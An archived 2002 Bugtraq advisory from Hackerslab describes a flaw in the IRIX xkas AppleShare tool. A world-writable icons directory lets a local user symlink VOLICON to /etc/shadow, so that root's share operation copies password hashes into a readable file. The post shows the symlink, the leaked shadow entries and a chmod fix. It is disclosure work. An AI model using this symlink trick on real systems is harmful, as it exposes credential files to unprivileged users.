[24002] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[ Hackerslab bug_paper ] Xkas application vulnerability

daemon@ATHENA.MIT.EDU (s96192@ce.hannam.ac.kr)
Mon Jan 28 11:40:28 2002

Date: Mon, 28 Jan 2002 18:06:16 +0900 (KST)
Message-Id: <200201280906.g0S96G108914@ce.hannam.ac.kr>
From: s96192@ce.hannam.ac.kr
To: bugtraq@securityfocus.com

=============================================================================

       [ Hackerslab bug_paper ] Xkas application vulnerability

=============================================================================

File   : /usr/etc/appletalk/xkas application

SYSTEM : tested irix 6.5

INFO :

Xkas is a server administration tool for appleshare. Misconfiguration by the user with the root privilege could lead to a serious security vulnerability.

.HSResource directory and .HSicon file is created when sharing a directory. 
Creation of the HSicon file is accomplished by copying the /var/adm/appletalk/icons/VOLICON file. A problem occurs during this process because the permission of /var/adm/appletalk/icons directory is set to 777 (world-writeable).
Link the wanted file with VOLICON like the following.

$ ls -al /var/adm/appletalk/icons
total 8
drwxrwxrwx    4 root     sys           57 Jan 25 03:12 .
drwxr-xr-x    6 root     sys         4096 Jan 24 16:05 ..
drwxr-xr-x    2 root  sys           9 Jan 25 03:12 .HSResource
lrwxr-xr-x    1 loveyou  user          11 Jan 25 03:05 VOLICON -> /etc/shadow

When the administrator uses the /usr/etc/appletalk/xkas directory to share the root  directory, the following files are created in the root.
$ ls -al /
total 17099
drwxr-xr-x   37 root     sys          4096 Jan 25 03:30 .
drwxr-xr-x   37 root     sys          4096 Jan 25 03:30 ..
drwxr-xr-x    2 root     sys             9 Jan 25 03:30 .HSResource
-rw-r--r--    1 root     sys           786 Jan 25 03:30 .HSicon  
(etc..)

$ cat /.HSicon
root:y7floveyous30I:10908::::::
bin:yxaiFduxixe8s:11127::::::
uucp:*:11127::::::
sys:*:11127::::::
adm:*:11127::::::
loveyou:mXaa2jxi/ejY:10877::::::
(etc..)

SOLUTION :
Remove other-write permission, contact your vendor and get a patch.
$ su -
# chmod o-w /var/adm/appletalk/icons

==-------------------------------------------------------------------------==
       *********
   *    **   **    *
 *      **   **      *
*       *******       *                                          Kim Yong-Jun
 *      **   **      *                                 loveyou@hackerslab.org
   *    **   **    *                           [  http://www.hackerslab.org ]
       *********            HACKERSLAB (C)  since 1999
==-------------------------------------------------------------------------==
©Каь


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[24002] in bugtraq

[ Hackerslab bug_paper ] Xkas application vulnerability

daemon@ATHENA.MIT.EDU (s96192@ce.hannam.ac.kr)Mon Jan 28 11:40:28 2002

daemon@ATHENA.MIT.EDU (s96192@ce.hannam.ac.kr)
Mon Jan 28 11:40:28 2002